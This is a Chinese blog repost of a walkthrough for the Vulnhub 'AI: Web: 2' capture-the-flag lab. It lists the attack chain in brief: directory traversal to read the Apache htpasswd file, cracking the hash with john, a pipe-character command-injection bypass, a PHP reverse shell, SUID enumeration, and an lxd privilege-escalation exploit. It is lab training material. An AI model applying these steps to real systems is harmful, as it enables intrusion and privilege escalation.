搜索

分享

QQ空间 QQ好友新浪微博微信

AI: Web: 2 Vulnhub Walkthrough

悦光阴 2021-12-03

展开全文

靶机下载链接：

https://www./entry/ai-web-2,357

主机端口扫描：

尝试SQL注入，未发现有注入漏洞，就注册创建于一账户

http://10.10.202.160/userpage.php

漏洞库搜索下：

XuezhuLi FileSharing - Directory Traversal

https://www./exploits/40009

我们爆破下目录看下

╰─ sudo python3 dirsearch.py -u http://10.10.202.160/ -e .php

我们尝试包含下Apache的认证文件看看

aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/

╰─ john --wordlist=/usr/share/wordlists/rockyou.txt htpwd

aiweb2admin:c.ronaldo

经过尝试&& ； | 发现| 可以绕过执行命令

访问：http://10.10.202.160/webadmin/H05Tpin9555/php-reverse.php

接下来进行提权操作：

find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null

n0nr00tuser@aiweb2host:/tmp$ ./LinEnum.sh

╰─ searchsploit lxd

创建hack.sh 文件，拷贝如下链接的脚本内容到hack.sh

https://www./exploits/46978

OVER !!

本站是提供个人知识管理的网络存储空间，所有内容均由用户发布，不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息，谨防诈骗。如发现有害或侵权内容，请点击一键举报。

转藏分享

QQ空间 QQ好友新浪微博微信

献花（0） +1

来自：悦光阴 > 《待分类》

举报/认领

0条评论

请遵守用户评论公约

类似文章 更多

悦光阴

关注对话

TA的最新馆藏

Delphi中ini文件读取的Value超长问题
趣谈 DHCP 协议，有点意思。
Should I use .done() and .fail() for new jQuery AJAX code instead of success and error
vue3 - 可复用 & 组合 - 组合式API - 生命周期钩子
【2021-03-02】勤奋、努力是积极的自然导向
Pytorch 中的 zero_grad 使用方法

喜欢该文的人也喜欢更多

热门阅读换一换